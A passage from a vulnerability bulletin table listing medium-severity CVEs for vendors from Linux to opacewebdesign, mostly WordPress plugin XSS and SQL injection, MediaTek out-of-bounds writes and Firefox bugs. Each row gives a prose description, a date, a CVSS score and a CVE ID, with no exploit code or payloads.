In the Linux kernel, the following vulnerability has been resolved: bpf: put bpf_link's program when link is safe to be deallocated In general, BPF link's underlying BPF program should be considered to be reachable through attach hook -> link -> prog chain, and, pessimistically, we have to assume that as long as link's memory is not safe to free, attach hook's code might hold a pointer to BPF program and use it. As such, it's not (generally) correct to put link's program early before waiting for RCU GPs to go through. More eager bpf_prog_put() that we currently do is mostly correct due to BPF program's release code doing similar RCU GP waiting, but as will be shown in the following patches, BPF program can be non-sleepable (and, thus, reliant on only "classic" RCU GP), while BPF link's attach hook can have sleepable semantics and needs to be protected by RCU Tasks Trace, and for such cases BPF link has to go through RCU Tasks Trace + "classic" RCU GPs before being deallocated. And so, if we put BPF program early, we might free BPF program before we free BPF link, leading to use-after-free situation. So, this patch defers bpf_prog_put() until we are ready to perform bpf_link's deallocation. At worst, this delays BPF program freeing by one extra RCU GP, but that seems completely acceptable. Alternatively, we'd need more elaborate ways to determine BPF hook, BPF link, and BPF program lifetimes, and how they relate to each other, which seems like an unnecessary complication. Note, for most BPF links we still will perform eager bpf_prog_put() and link dealloc, so for those BPF links there are no observable changes whatsoever. Only BPF links that use deferred dealloc might notice slightly delayed freeing of BPF programs. Also, to reduce code and logic duplication, extract program put + link dealloc logic into bpf_link_dealloc() helper. | 2025-01-08 | 5.5 | CVE-2024-56786 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: soc: imx8m: Probe the SoC driver as platform driver With driver_async_probe=* on kernel command line, the following trace is produced because on i.MX8M Plus hardware because the soc-imx8m.c driver calls of_clk_get_by_name() which returns -EPROBE_DEFER because the clock driver is not yet probed. This was not detected during regular testing without driver_async_probe. Convert the SoC code to platform driver and instantiate a platform device in its current device_initcall() to probe the platform driver. Rework .soc_revision callback to always return valid error code and return SoC revision via parameter. This way, if anything in the .soc_revision callback return -EPROBE_DEFER, it gets propagated to .probe and the .probe will get retried later. " ------------[ cut here ]------------ WARNING: CPU: 1 PID: 1 at drivers/soc/imx/soc-imx8m.c:115 imx8mm_soc_revision+0xdc/0x180 CPU: 1 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.11.0-next-20240924-00002-g2062bb554dea #603 Hardware name: DH electronics i.MX8M Plus DHCOM Premium Developer Kit (3) (DT) pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : imx8mm_soc_revision+0xdc/0x180 lr : imx8mm_soc_revision+0xd0/0x180 sp : ffff8000821fbcc0 x29: ffff8000821fbce0 x28: 0000000000000000 x27: ffff800081810120 x26: ffff8000818a9970 x25: 0000000000000006 x24: 0000000000824311 x23: ffff8000817f42c8 x22: ffff0000df8be210 x21: fffffffffffffdfb x20: ffff800082780000 x19: 0000000000000001 x18: ffffffffffffffff x17: ffff800081fff418 x16: ffff8000823e1000 x15: ffff0000c03b65e8 x14: ffff0000c00051b0 x13: ffff800082790000 x12: 0000000000000801 x11: ffff80008278ffff x10: ffff80008209d3a6 x9 : ffff80008062e95c x8 : ffff8000821fb9a0 x7 : 0000000000000000 x6 : 00000000000080e3 x5 : ffff0000df8c03d8 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000000 x1 : fffffffffffffdfb x0 : fffffffffffffdfb Call trace: imx8mm_soc_revision+0xdc/0x180 imx8_soc_init+0xb0/0x1e0 do_one_initcall+0x94/0x1a8 kernel_init_freeable+0x240/0x2a8 kernel_init+0x28/0x140 ret_from_fork+0x10/0x20 ---[ end trace 0000000000000000 ]--- SoC: i.MX8MP revision 1.1 " | 2025-01-08 | 5.5 | CVE-2024-56787 |
| litonice13--Master Addons Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations |
The Master Addons - Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Tooltip module in all versions up to, and including, 2.0.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-9502 |
| Lucia Intelisano--Live Flight Radar |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lucia Intelisano Live Flight Radar allows Stored XSS.This issue affects Live Flight Radar: from n/a through 1.0. | 2025-01-09 | 6.5 | CVE-2025-22824 |
| lumiblog--Marketplace Items |
The Marketplace Items plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'envato' shortcode in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12437 |
| lumiblog--Marketplace Items |
The Marketplace Items plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'marketplace' shortcode in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12439 |
| M Bilal M--Urdu Formatter Shamil |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in M Bilal M Urdu Formatter - Shamil allows Stored XSS.This issue affects Urdu Formatter - Shamil: from n/a through 0.1. | 2025-01-07 | 6.5 | CVE-2025-22531 |
| MacPorts--MacPorts |
A malicious or compromised MacPorts mirror can execute arbitrary commands as root on the machine of a client running port selfupdate against the mirror. | 2025-01-07 | 6.8 | CVE-2024-11681 |
| madrasthemes--MAS Elementor |
The MAS Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-01-08 | 6.4 | CVE-2024-12328 |
| MagePeople Team--Bus Ticket Booking with Seat Reservation |
Cross-Site Request Forgery (CSRF) vulnerability in MagePeople Team Bus Ticket Booking with Seat Reservation allows Cross Site Request Forgery.This issue affects Bus Ticket Booking with Seat Reservation: from n/a through 5.4.3. | 2025-01-07 | 4.3 | CVE-2024-49294 |
| magepeopleteam--Rental and Booking Manager for Bike, Car, Dress, Resort with WooCommerce Integration WpRently | WordPress plugin |
The Rental and Booking Manager for Bike, Car, Dress, Resort with WooCommerce Integration - WpRently | WordPress plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'active_tab' parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.1 | CVE-2024-12412 |
| makeplane--plane |
Plane is an open-source project management tool. A cross-site scripting (XSS) vulnerability has been identified in Plane versions prior to 0.23. The vulnerability allows authenticated users to upload SVG files containing malicious JavaScript code as profile images, which gets executed in victims' browsers when viewing the profile image. | 2025-01-06 | 5.4 | CVE-2025-21616 |
| manycontacts--WhatsApp click to chat |
The WhatsApp 🚀 click to chat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'manycontacts_code' parameter in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-11686 |
| Marcus C. J. Hartmann--mcjh button shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marcus C. J. Hartmann mcjh button shortcode allows Stored XSS.This issue affects mcjh button shortcode: from n/a through 1.6.4. | 2025-01-07 | 6.5 | CVE-2025-22558 |
| marekzak01--SmartEmailing.cz |
The SmartEmailing.cz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'se-lists-updated' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12261 |
| masjidal--Muslim Prayer Time-Salah/Iqamah |
The Muslim Prayer Time-Salah/Iqamah plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Masjid ID parameter in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12515 |
| matrix-org--matrix-rust-sdk |
matrix-rust-sdk is an implementation of a Matrix client-server library in Rust. Versions of the matrix-sdk-crypto Rust crate before 0.8.0 lack a dedicated mechanism to notify that a user's cryptographic identity has changed from a verified to an unverified one, which could cause client applications relying on the SDK to overlook such changes. matrix-sdk-crypto 0.8.0 adds a new VerificationLevel::VerificationViolation enum variant which indicates that a previously verified identity has been changed. | 2025-01-07 | 4.3 | CVE-2024-52813 |
| Mattermost--Mattermost |
Mattermost versions 10.2.0, 9.11.x <= 9.11.5, 10.0.x <= 10.0.3, 10.1.x <= 10.1.3 fail to properly validate post types, which allows attackers to deny service to users with the sysconsole_read_plugins permission via creating a post with the custom_pl_notification type and specific props. | 2025-01-09 | 4.3 | CVE-2025-20033 |
| maximize--Simple Video Management System |
The Simple Video Management System plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'analytics_video' parameter in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12256 |
| mdmag--Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress |
The Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quillforms-popup' shortcode in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11826 |
| MediaTek, Inc.--MT2737, MT2739, MT6789, MT6813, MT6815, MT6835, MT6835T, MT6855, MT6878, MT6878T, MT6879, MT6886, MT6895, MT6895T, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6985, MT6986, MT6986D, MT6988, MT6989, MT6990, MT6991, MT8676, MT8678, MT8798, MT8863 |
In Modem, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: MOLY01399339; Issue ID: MSV-1928. | 2025-01-06 | 6.7 | CVE-2024-20151 |
| MediaTek, Inc.--MT2737, MT3603, MT6835, MT6878, MT6886, MT6897, MT6990, MT7902, MT7920, MT7922, MT8518S, MT8532, MT8755, MT8766, MT8768, MT8775, MT8781, MT8796, MT8798, MT8893 |
In wlan STA driver, there is a possible reachable assertion due to improper exception handling. This could lead to local denial of service if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: WCNCR00389047 / ALPS09136505; Issue ID: MSV-1798. | 2025-01-06 | 4.4 | CVE-2024-20152 |
| MediaTek, Inc.--MT2737, MT6739, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6878, MT6879, MT6880, MT6885, MT6886, MT6890, MT6893, MT6895, MT6897, MT6980, MT6985, MT6989, MT6990, MT8370, MT8390, MT8676 |
In V6 DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS09167056; Issue ID: MSV-2041. | 2025-01-06 | 6.6 | CVE-2024-20144 |
| MediaTek, Inc.--MT2737, MT6781, MT6789, MT6835, MT6855, MT6878, MT6879, MT6880, MT6886, MT6890, MT6895, MT6897, MT6980, MT6983, MT6985, MT6989, MT6990, MT8370, MT8390, MT8676 |
In V6 DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS09167056; Issue ID: MSV-2069. | 2025-01-06 | 6.6 | CVE-2024-20143 |
| MediaTek, Inc.--MT2737, MT6781, MT6789, MT6835, MT6855, MT6878, MT6879, MT6880, MT6886, MT6890, MT6895, MT6897, MT6980, MT6983, MT6985, MT6989, MT6990, MT8676 |
In V6 DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS09290940; Issue ID: MSV-2040. | 2025-01-06 | 6.6 | CVE-2024-20145 |
| MediaTek, Inc.--MT6580, MT6739, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8666, MT8667, MT8673, MT8768 |
In m4u, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09062027; Issue ID: MSV-1743. | 2025-01-06 | 6.7 | CVE-2024-20105 |
| MediaTek, Inc.--MT6739, MT6761, MT6768, MT6781, MT6833, MT6853, MT6877, MT6885, MT6893, MT8518S, MT8532 |
In power, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09270402; Issue ID: MSV-2020. | 2025-01-06 | 6.7 | CVE-2024-20140 |
| metaphorcreations--Post Duplicator |
The Post Duplicator plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.36 via the mtphr_duplicate_post() due to insufficient restrictions on which posts can be duplicated. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to by duplicating the post. | 2025-01-11 | 5.3 | CVE-2024-12472 |
| MicroWorld--eScan Antivirus |
A vulnerability was found in MicroWorld eScan Antivirus 7.0.32 on Linux. It has been rated as critical. Affected by this issue is some unknown functionality of the file /opt/MicroWorld/var/ of the component Installation Handler. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-08 | 5.3 | CVE-2024-13188 |
| milmor--WP SPID Italia |
The WP SPID Italia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-11758 |
| Mind Doodle--Mind Doodle Visual Sitemaps & Tasks |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mind Doodle Mind Doodle Visual Sitemaps & Tasks allows Stored XSS.This issue affects Mind Doodle Visual Sitemaps & Tasks: from n/a through 1.6. | 2025-01-07 | 6.5 | CVE-2025-22544 |
| Modeltheme--MT Addons for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Modeltheme MT Addons for Elementor allows Stored XSS.This issue affects MT Addons for Elementor: from n/a through 1.0.6. | 2025-01-09 | 6.5 | CVE-2025-22811 |
| Modernaweb Studio--Black Widgets For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Modernaweb Studio Black Widgets For Elementor allows DOM-Based XSS.This issue affects Black Widgets For Elementor: from n/a through 1.3.8. | 2025-01-09 | 6.5 | CVE-2025-22806 |
| Mozilla--Firefox |
Memory safety bugs present in Firefox 133, Thunderbird 133, Firefox ESR 115.18, Firefox ESR 128.5, Thunderbird 115.18, and Thunderbird 128.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Firefox ESR < 115.19, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | 6.5 | CVE-2025-0242 |
| Mozilla--Firefox |
When using an invalid protocol scheme, an attacker could spoof the address bar. *Note: This issue only affected Android operating systems. Other operating systems are unaffected.* *Note: This issue is a different issue from CVE-2025-0244. This vulnerability affects Firefox < 134. | 2025-01-07 | 6.5 | CVE-2025-0246 |
| Mozilla--Firefox |
The WebChannel API, which is used to transport various information across processes, did not check the sending principal but rather accepted the principal being sent. This could have led to privilege escalation attacks. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | 5.4 | CVE-2025-0237 |
| Mozilla--Firefox |
Assuming a controlled failed memory allocation, an attacker could have caused a use-after-free, leading to a potentially exploitable crash. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Firefox ESR < 115.19, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | 5.3 | CVE-2025-0238 |
| Mozilla--Firefox |
Memory safety bugs present in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | 5.1 | CVE-2025-0243 |
| Mozilla--Firefox |
When redirecting to an invalid protocol scheme, an attacker could spoof the address bar. *Note: This issue only affected Android operating systems. Other operating systems are unaffected.* This vulnerability affects Firefox < 134. | 2025-01-07 | 5.3 | CVE-2025-0244 |
| Mozilla--Firefox |
When using Alt-Svc, ALPN did not properly validate certificates when the original server is redirecting to an insecure site. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | 4 | CVE-2025-0239 |
| Mozilla--Firefox |
Parsing a JavaScript module as JSON could, under some circumstances, cause cross-compartment access, which may result in a use-after-free. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | 4 | CVE-2025-0240 |
| mpc--Responsive FlipBook Plugin Wordpress |
The Responsive FlipBook Plugin Wordpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the rfbwp_save_settings() functionin all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-11929 |
| murali-indiacitys--Push Notification for Post and BuddyPress |
The Push Notification for Post and BuddyPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'pushnotificationid' parameter in all versions up to, and including, 2.06 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-11 | 6.1 | CVE-2024-12407 |
| muzaara--Optimize Your Campaigns Google Shopping Google Ads Google Adwords |
The Optimize Your Campaigns - Google Shopping - Google Ads - Google Adwords plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1 due to the print_php_information.php being publicly accessible. This makes it possible for unauthenticated attackers to extract sensitive configuration data that can be leveraged in another attack. | 2025-01-07 | 5.3 | CVE-2024-12159 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in Grav v1.7.45 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-01-06 | 6.1 | CVE-2024-35498 |
| n/a--n/a |
A reflected Cross-Site Scripting (XSS) vulnerability exists in the login page of IceHRM v32.4.0.OS. The vulnerability is due to improper sanitization of the "next" parameter, which is included in the application's response without adequate escaping. An attacker can exploit this flaw by tricking a user into visiting a specially crafted URL, causing the execution of arbitrary JavaScript code in the context of the victim's browser. The issue occurs even though the application has sanitization mechanisms in place. | 2025-01-06 | 6.1 | CVE-2024-46073 |
| n/a--n/a |
Cross Site Scripting vulnerability iPublish Media Solutions AdPortal 3.0.39 allows a remote attacker to escalate privileges via the shippingAsBilling parameter in updateuserinfo.html. | 2025-01-07 | 6.1 | CVE-2024-50659 |
| n/a--n/a |
Open Redirect vulnerability in Pnetlab 5.3.11 allows an attacker to manipulate URLs to redirect users to arbitrary external websites via a crafted script | 2025-01-06 | 6.1 | CVE-2024-51112 |
| n/a--n/a |
The com.callerscreen.colorphone.themes.callflash (aka Color Call Theme & Call Screen) application through 1.0.7 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.android.call.color.app.activities.DialerActivity component. | 2025-01-06 | 6.3 | CVE-2024-53933 |
| n/a--n/a |
The com.callos14.callscreen.colorphone (aka iCall OS17 - Color Phone Flash) application through 4.3 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.callos14.callscreen.colorphone.DialerActivity component. | 2025-01-06 | 6.5 | CVE-2024-53935 |
| n/a--n/a |
The com.asianmobile.callcolor (aka Color Phone Call Screen App) application through 24 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.asianmobile.callcolor.ui.component.call.CallActivity component. | 2025-01-06 | 6.3 | CVE-2024-53936 |
| n/a--n/a |
BigAnt Office Messenger 5.6.06 is vulnerable to SQL Injection via the 'dev_code' parameter. | 2025-01-09 | 6.3 | CVE-2024-54761 |
| n/a--n/a |
Ruoyi v.4.7.9 and before contains an authenticated SQL injection vulnerability. This is because the filterKeyword method does not completely filter SQL injection keywords, resulting in the risk of SQL injection. | 2025-01-09 | 6.3 | CVE-2024-54762 |
| n/a--n/a |
An access control issue in the component /login/hostinfo.cgi of ipTIME A2004 v12.17.0 allows attackers to obtain sensitive information without authentication. | 2025-01-06 | 6.5 | CVE-2024-54763 |
| n/a--n/a |
An access control issue in the component /login/hostinfo2.cgi of ipTIME A2004 v12.17.0 allows attackers to obtain sensitive information without authentication. | 2025-01-06 | 6.5 | CVE-2024-54764 |
| n/a--n/a |
IceWarp Server 10.2.1 is vulnerable to Cross Site Scripting (XSS) via the meta parameter. | 2025-01-07 | 6.1 | CVE-2024-55218 |
| n/a--n/a |
An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function. | 2025-01-08 | 6.5 | CVE-2024-55459 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in Opencode Mobile Collect Call v5.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the op_func parameter at /occontrolpanel/index.php. | 2025-01-09 | 6.1 | CVE-2024-55494 |
| n/a--n/a |
A flaw was found in FFmpeg. This vulnerability allows unexpected additional CPU load and storage consumption, potentially leading to degraded performance or denial of service via the demuxing of arbitrary data as XBIN-formatted data without proper format validation. | 2025-01-06 | 5.3 | CVE-2023-6604 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in Nagios XI 2024R1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter in the Account Settings page. | 2025-01-09 | 5.4 | CVE-2024-42898 |
| n/a--n/a |
Multiple functions are vulnerable to Authorization Bypass in AIMS eCrew. The issue was fixed in version JUN23 #190. | 2025-01-07 | 5.4 | CVE-2024-44450 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the component /media/test.html of REDAXO CMS v5.17.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the password parameter. | 2025-01-06 | 5.4 | CVE-2024-46209 |
| n/a--n/a |
Vaultwarden v1.32.5 was discovered to contain an authenticated reflected cross-site scripting (XSS) vulnerability via the component /api/core/mod.rs. | 2025-01-09 | 5.4 | CVE-2024-55226 |
| n/a--n/a |
An issue in the AsusSAIO.sys component of ASUS System Analysis IO v1.0.0 allows attackers to perform arbitrary read and write actions via supplying crafted IOCTL requests. | 2025-01-06 | 5.3 | CVE-2024-55408 |
| n/a--n/a |
A flaw was found in FFmpeg's HLS demuxer. This vulnerability allows bypassing unsafe file extension checks and triggering arbitrary demuxers via base64-encoded data URIs appended with specific file extensions. | 2025-01-06 | 4.7 | CVE-2023-6601 |
| n/a--n/a |
Cross-Site Scripting (XSS) vulnerability in Pnetlab 5.3.11 allows an attacker to inject malicious scripts into a web page, which are executed in the context of the victim's browser. | 2025-01-06 | 4.1 | CVE-2024-51111 |
| n/a--pgAgent |
When batch jobs are executed by pgAgent, a script is created in a temporary directory and then executed. In versions of pgAgent prior to 4.2.3, an insufficiently seeded random number generator is used when generating the directory name, leading to the possibility for a local attacker to pre-create the directory and thus prevent pgAgent from executing jobs, disrupting scheduled tasks. | 2025-01-07 | 5.5 | CVE-2025-0218 |
| n/a--SEMCMS |
A vulnerability has been found in SEMCMS up to 4.8 and classified as critical. Affected by this vulnerability is an unknown functionality of the file SEMCMS_Images.php of the component Image Library Management Page. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-08 | 6.3 | CVE-2024-13193 |
| n/a--Sucms |
A vulnerability was found in Sucms 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/admin_members.php?ac=search. The manipulation of the argument uid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2024-13194 |
| n/a--YunzMall |
A vulnerability, which was classified as critical, has been found in YunzMall up to 2.4.2. This issue affects the function changePwd of the file /app/platform/controllers/ResetpwdController.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 5.3 | CVE-2025-0331 |
| Nagy Sandor--Simple Photo Sphere |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nagy Sandor Simple Photo Sphere allows Stored XSS.This issue affects Simple Photo Sphere: from n/a through 0.0.10. | 2025-01-07 | 6.5 | CVE-2025-22532 |
| nasirahmed--Advanced Form Integration |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nasirahmed Advanced Form Integration allows Stored XSS.This issue affects Advanced Form Integration: from n/a through 1.95.0. | 2025-01-07 | 5.9 | CVE-2024-56293 |
| newsletter2go--Newsletter2Go |
The Newsletter2Go plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'resetStyles' AJAX action in all versions up to, and including, 4.0.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset styles. | 2025-01-09 | 4.3 | CVE-2024-12618 |
| nickboss--WordPress File Upload |
The WordPress File Upload plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wfu_ajax_action_read_subfolders' function in all versions up to, and including, 4.24.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform limited path traversal to view directories and subdirectories in WordPress. Files cannot be viewed. | 2025-01-07 | 4.3 | CVE-2024-12719 |
| OISF--suricata |
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.8, a specially crafted TCP stream can lead to a very large buffer overflow while being zero-filled during initialization with memset due to an unsigned integer underflow. The issue has been addressed in Suricata 7.0.8. | 2025-01-06 | 5.9 | CVE-2024-55627 |
| Olaf Lederer--EO4WP |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Olaf Lederer EO4WP allows Stored XSS.This issue affects EO4WP: from n/a through 1.0.7. | 2025-01-07 | 6.5 | CVE-2025-22327 |
| One Plus Solution--jQuery TwentyTwenty |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in One Plus Solution jQuery TwentyTwenty allows Stored XSS.This issue affects jQuery TwentyTwenty: from n/a through 1.0. | 2025-01-07 | 6.5 | CVE-2025-22546 |
| opacewebdesign--AI Scribe SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) |
The AI Scribe - SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to SQL Injection via the 'template_id' parameter of the 'article_builder_generate_data' shortcode in all versions up to, and including, 2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-10 | 6.5 | CVE-2024-12473 |
| opacewebdesign--AI Scribe SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) |
The AI Scribe - SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the "al_scribe_content_data" actions. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-09 | 4.3 | CVE-2024-12605 |
| opacewebdesign--AI Scribe SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) |
